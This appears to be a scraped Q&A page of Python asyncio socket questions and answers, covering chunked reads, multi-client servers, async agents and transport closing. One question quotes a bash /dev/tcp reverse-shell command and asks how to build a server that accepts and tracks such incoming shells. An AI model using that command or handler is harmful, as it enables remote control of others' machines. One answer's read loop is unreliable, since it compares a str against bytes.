How to avoid blocking when reading from a socket with python asyncio? - python

I'm trying to experiment a bit with python asyncio to improve in that area, for self teaching purposes I'm trying to connect to redis, send some commands and read the response, this can fall under generic "read a stream of data from some source". The problem I cannot solve is how to read data in chunks, since the connection is not being closed between server and client and the termination sequence \r\n could be met more than once. If I await when there is no more data of course the call will block until something else will be received.
class Client:
def __init__(self, loop, host='127.0.0.1', port=6379):
self.host = host
self.port = port
self.reader = None
self.writer = None
self.loop = loop
#asyncio.coroutine
def _connect(self):
self.reader, self.writer = yield from asyncio.open_connection(
self.host, self.port, loop=self.loop)
async def read(self, b=4096):
resp = b''
while True:
chunk = await self.reader.read(b)
if chunk:
resp += chunk
else:
break
return resp
Let's pretend I want to read the response in chunks of 2 bytes (yes is stupid but it's just for this learning purpose) so:
loop = asyncio.get_event_loop()
client = Client(loop)
..... sends some commands here ....
resp = await client.read(2)
I cannot figure out how while not knowing the length of the server response the code can still be safe when the response is longer than the bytes read from the socket.

I encountered a similar problem recently. My solution was to continue reading until a given character (or set of characters) is read. This is the same philosophy behind people saying "over" on walkie talkies when they are done talking. It is easier to just wait for the response to say that it is done talking.
While I haven't worked with the asyncio module before, I believe that the following code should solve your problem, assuming that the source of the input ends the response with whatever character (or string of characters) is indicated in the variable end_signal.
class Client:
def __init__(self, loop, host='127.0.0.1', port=6379):
self.host = host
self.port = port
self.reader = None
self.writer = None
self.loop = loop
#asyncio.coroutine
def _connect(self):
self.reader, self.writer = yield from asyncio.open_connection(
self.host, self.port, loop=self.loop)
async def read(self, b=4096, end_signal = "10101101110111110"):
resp = b''
while True:
chunk = await self.reader.read(b)
resp += chunk
if resp[-1*len(end_signal):] == end_signal:
break
return resp

Related

how do i switch between connected clients with asyncio sockets

I am trying to make a socket server that's able to have multiple clients connected using the asyncio sockets and is able to easily switch between which client it communicates while still having all the clients connected. I thought there would be some type of FD of the clients like there is in sockets, but I looked through the docs and did not find anything, or I missed it.
Here is my server code:
import socket
import asyncio
host = "localhost"
port = 9998
list_of_auths = ['desktop-llpeu0p\\tomiss', 'desktop-llpeu0p\\tomisss',
'desktop-llpeu0p\\tomissss', 'desktop-llpeu0p\\tomisssss']
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print('socket initiated.')
confirmed = 'CONFIRMED'
deny = 'denied'
#(so i dont forget) to get recv in async do: var = (await reader.read(4096)).decode('utf-8') if -1 then it will read all
#(so i dont forget) to write sendall do: writer.write(var.encode('utf-8')) should be used with await writer.drain()
async def handle_client(reader, writer):
idrecv = (await reader.read(255)).decode('utf-8')
if idrecv in list_of_auths:
writer.write(confirmed.encode('utf-8'))
else:
writer.write(deny.encode('utf-8'))
writer.close()
request = None
while request != 'quit':
print("second checkpoint")
writer.close()
async def run_server():
print("first checkpoint")
server = await asyncio.start_server(handle_client, host, port)
async with server:
await server.serve_forever()
asyncio.run(run_server())
This code allows multiple clients to connect at once; However, it only lets me communicate with the last one that connected.
I would suggest to implement it like so:
class SocketHandler(asyncio.Protocol):
def __init__(self):
asyncio.Protocol.__init__(self)
self.transport = None
self.peername = None
# your other code
def connection_made(self, transport):
""" incoming connection """
global ALL_CONNECTIONS
self.transport = transport
self.peername = transport.get_extra_info('peername')
ALL_CONNECTIONS.append(self)
# your other code
def connection_lost(self, exception):
self.close()
# your other code
def data_received(self, data):
# your code handling incoming data
def close(self):
try:
self.transport.close()
except AttributeError:
pass
# global list to store all connections
ALL_CONNECTIONS = []
def send_to_all(message):
""" sending a message to all connected clients """
global ALL_CONNECTIONS
for sh in ALL_CONNECTIONS:
# here you can also check sh.peername to know which client it is
if sh.transport is not None:
sh.transport.write(message)
port = 5060
loop = asyncio.get_event_loop()
coro = loop.create_server(SocketHandler, '', port)
server = loop.run_until_complete(coro)
loop.run_forever()
This way, each connection to the server is represented by an instance of SocketHandler. Whenever you process some data inside this instance, you know which client connection it is.

How to run multiple instances of the same class asynchrously?

I'm looking to have many agents connect to different sockets of my local server so they can independently read and send to the server. So far I have this:
import json
import asyncio
class Agent():
def __init__(self, user, pw):
self.user = user
self.pw = pw
# Store host and port
self.host, self.port = "localhost", 12300
self.connect()
async def connect(self):
# Create asynchronous socket reader and writer
self.reader, self.writer = await asyncio.open_connection(self.host,
self.port)
request = <some_json>
# Create and send authentication request
self.writer.write(request)
await self.writer.drain()
response = await self.reader.read(1000)
response = json.loads(response.decode().split("\0")[0])
if response["content"]["result"] == "ok":
print("Connection Succesful")
else:
print("Connection Failed")
await self.listen()
async def receive_msg(self):
"""
Waits for a message from the server and returns it.
"""
msg = await self.reader.readuntil(b"\0")
msg = msg.decode().split("\0")[0]
# In case a message is received, parse it into a dictionary.
if len(msg) > 1:
return json.loads(msg)
else:
print("Retry receiving message...")
return self.receive_msg()
async def listen(self):
"""
Listens for output from server and writes if anything is received
"""
while True:
msg = await self.receive_msg()
print("Message received", self.user)
a_list = []
loop = asyncio.get_event_loop()
for i in range(15):
a_list.append(Agent(f"agentA{i}", "1").connect())
loop.run_until_complete(asyncio.gather(*a_list))
Because of the way asyncio works I think this is the only way to run this asynchrously. But I would like to be able to make the __init__ run asynchrously somehow instead of having to throw the connect function into the loop if that is possible. What I essentially would like to do is this:
a_list = []
loop = asyncio.get_event_loop()
for i in range(15):
a_list.append(Agent(f"agentA{i}", "1"))
loop.run_until_complete(asyncio.gather(*a_list))
I think that that makes more sense, but I can't figure out how to do it. Am I thinking wrongly, or is there a better way to do this?
You can't make __init__ async, but you can make Agent instances awaitable. To do so, define the __await__ magic method:
class Agent:
def __init__(self, user, pw):
self.user = user
self.pw = pw
self.host, self.port = "localhost", 12300
def __await__(self):
yield from self.connect().__await__()
This has the best of both worlds: your __init__ function remains sync, and yet Agent instances are valid arguments to functions like asyncio.gather().

How can I accept new connection requests in the background?

I have the server which accepts connection requests from clients. Clients send connection requests using this command: bash -i > /dev/tcp/ip/port 0<&1 1>&1. I want my server to instantly accept new connection requests and log them to console but I don't know how. In the code below there is while loop. As we can see command_accept() need to finish itself for client_accept() to start. That means I always need to pass some command to accept new client requests. I need client_accept() to be always running in the background.
I tried to set a time limit to my input but that's not a solution I need. Also I tried different libraries for asynchronous programming though I'm not sure I'm doing this correctly.
import socket
import time
import sys
host = '127.0.0.1'
port = 1344
id_counter = 0
server = socket.socket()
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.settimeout(0.1)
server.bind((host, port))
server.listen()
clients = {}
def client_accept(server):
while True:
try:
conn, addr = server.accept()
global id_counter
id_counter += 1
clients[id_counter] = (conn, addr)
print(f'{time.ctime()} New client [ID {id_counter}] with address {str(addr[0])}:{str(addr[1])}')
except socket.timeout:
break
def command_accept():
command = input('server > ')
#** don't pay attention **#
if command == 'exit':
sys.exit()
else:
print(f'command {command} accepted!')
while True:
command_accept()
client_accept(server)
Expected result: I don't pass anything to the input in command_accept and yet if new client sent request then the server will instantly accept it and print something like New client [ID 1] with address 127.0.0.1:45431.
Try to do that with socket.io and Threading, so if the socket got a ON_CONNECT event you can just push the information in a list and print it to the console.
as an excuse to experiment with the trio async library I ported your code to it
start by defining a simple class for client connections and the code to keep track of them:
from sys import stderr
from itertools import count
class Client:
def __init__(self, stream):
self.stream = stream
async def run(self):
lines = LineReader(self.stream)
while True:
line = (await lines.readline()).decode('ascii')
if not line or line.strip().casefold() in {'quit', 'exit'}:
await self.stream.send_all(b'bye!\r\n')
break
resp = f'got {line!r}'
await self.stream.send_all(resp.encode('ascii') + b'\r\n')
CLIENT_COUNTER = count()
CLIENTS = {}
async def handle_client(stream):
client_id = next(CLIENT_COUNTER)
client = Client(stream)
async with stream:
CLIENTS[client_id] = client
try:
await client.run()
except Exception as err:
print('client failed', err, file=stderr)
finally:
del CLIENTS[client_id]
LineReader comes from here: https://stackoverflow.com/a/53576829/1358308
next we can define the server stdin processing:
async def handle_local(nursery):
while True:
try:
command = await async_input('server > ')
except EOFError:
command = 'exit'
if command == 'exit':
nursery.cancel_scope.cancel()
elif command == 'list':
for id, client in CLIENTS.items():
print(id, client.stream.socket.getpeername())
else:
print(f'unknown command {command!r}')
check out the docs for info about nurseries
this uses a utility function to wrap input up into an async function.
import trio
async def async_input(prompt=None):
return await trio.run_sync_in_worker_thread(
input, prompt, cancellable=True)
then we define code to tie all the pieces together:
SERVE_HOST = 'localhost'
SERVE_PORT = 1344
async def async_main():
async with trio.open_nursery() as nursery:
nursery.start_soon(handle_local, nursery)
await trio.serve_tcp(
handle_client,
port=SERVE_PORT, host=SERVE_HOST,
handler_nursery=nursery)
trio.run(async_main)
some more links/references (by trio's author):
tutorial echo server
motivation behind the trio library

Pythonic asyncio communication with unreliable servers

Is there a standard pattern for using asyncio to poll intermittent servers?
Take the following example: a client that reads every second from an unreliable TCP server. Without error handling, the async/await notation looks great:
class BasicTCPClient(object):
"""TCP client without error handling."""
def __init__(self, ip, port):
self.ip = ip
self.port = port
async def connect(self):
reader, writer = await asyncio.open_connection(self.ip, self.port)
self.connection = {'reader': reader, 'writer': writer}
async def get(self, request):
self.connection['writer'].write(request.encode())
return await self.connection['reader'].readuntil(b'\n')
async def read():
client = BasicTCPClient('ip', 8000)
await client.connect()
while True:
print(await client.get('request'))
await asyncio.sleep(1)
ioloop = asyncio.get_event_loop()
try:
ioloop.run_until_complete(read())
except KeyboardInterrupt:
pass
But this doesn't handle disconnecting/reconnecting well. I have a working solution, but it's approaching 100 LOC and negates all the elegance of async/await.

How to close python asyncio transport?

I'm working on a project which uses python asyncio socket server. The problem is that the implementation of the server doesn't call .close() on the transport when the server stops. This seems to leave clients connected and causes crashes in other parts of the code.
Python documents say that transports need to be closed explicitly, but in this project I don't know where I can close them because there is no reference to the transports that are created for each client.
https://docs.python.org/3/library/asyncio-dev.html#close-transports-and-event-loops
Here is the code:
"""
Socket server forwarding request to internal server
"""
import logging
try:
# we prefer to use bundles asyncio version, otherwise fallback to trollius
import asyncio
except ImportError:
import trollius as asyncio
from opcua import ua
from opcua.server.uaprocessor import UaProcessor
logger = logging.getLogger(__name__)
class BinaryServer(object):
def __init__(self, internal_server, hostname, port):
self.logger = logging.getLogger(__name__)
self.hostname = hostname
self.port = port
self.iserver = internal_server
self.loop = internal_server.loop
self._server = None
self._policies = []
def set_policies(self, policies):
self._policies = policies
def start(self):
class OPCUAProtocol(asyncio.Protocol):
"""
instanciated for every connection
defined as internal class since it needs access
to the internal server object
FIXME: find another solution
"""
iserver = self.iserver
loop = self.loop
logger = self.logger
policies = self._policies
def connection_made(self, transport):
self.peername = transport.get_extra_info('peername')
self.logger.info('New connection from %s', self.peername)
self.transport = transport
self.processor = UaProcessor(self.iserver, self.transport)
self.processor.set_policies(self.policies)
self.data = b""
def connection_lost(self, ex):
self.logger.info('Lost connection from %s, %s', self.peername, ex)
self.transport.close()
self.processor.close()
def data_received(self, data):
logger.debug("received %s bytes from socket", len(data))
if self.data:
data = self.data + data
self.data = b""
self._process_data(data)
def _process_data(self, data):
buf = ua.utils.Buffer(data)
while True:
try:
backup_buf = buf.copy()
try:
hdr = ua.Header.from_string(buf)
except ua.utils.NotEnoughData:
logger.info("We did not receive enough data from client, waiting for more")
self.data = backup_buf.read(len(backup_buf))
return
if len(buf) < hdr.body_size:
logger.info("We did not receive enough data from client, waiting for more")
self.data = backup_buf.read(len(backup_buf))
return
ret = self.processor.process(hdr, buf)
if not ret:
logger.info("processor returned False, we close connection from %s", self.peername)
self.transport.close()
return
if len(buf) == 0:
return
except Exception:
logger.exception("Exception raised while parsing message from client, closing")
self.transport.close()
break
coro = self.loop.create_server(OPCUAProtocol, self.hostname, self.port)
self._server = self.loop.run_coro_and_wait(coro)
print('Listening on {}:{}'.format(self.hostname, self.port))
def stop(self):
self.logger.info("Closing asyncio socket server")
self.loop.call_soon(self._server.close)
self.loop.run_coro_and_wait(self._server.wait_closed())
As you can see when we call stop() on this server class the asyncio server calls it's close method. However if clients are connected the created transports never get closed.
The project repository is here https://github.com/FreeOpcUa/python-opcua/ , you can take a look at Issue 137.
What is the correct way to close the transport object?
I solve this by applying this approach:
#self.OPCUAServer - this is my opcua server
nodes = []
nodes.append(self.OPCUAServer.get_node("ns=0; s=Measurements")) #Adding two root nodes
nodes.append(self.OPCUAServer.get_node("ns=1; s=Calibrations")) #to the list
self.OPCUAServer.delete_nodes(nodes, True) # Recursively call delete_nodes with this list
self.OPCUAServer.stop()

Categories

Resources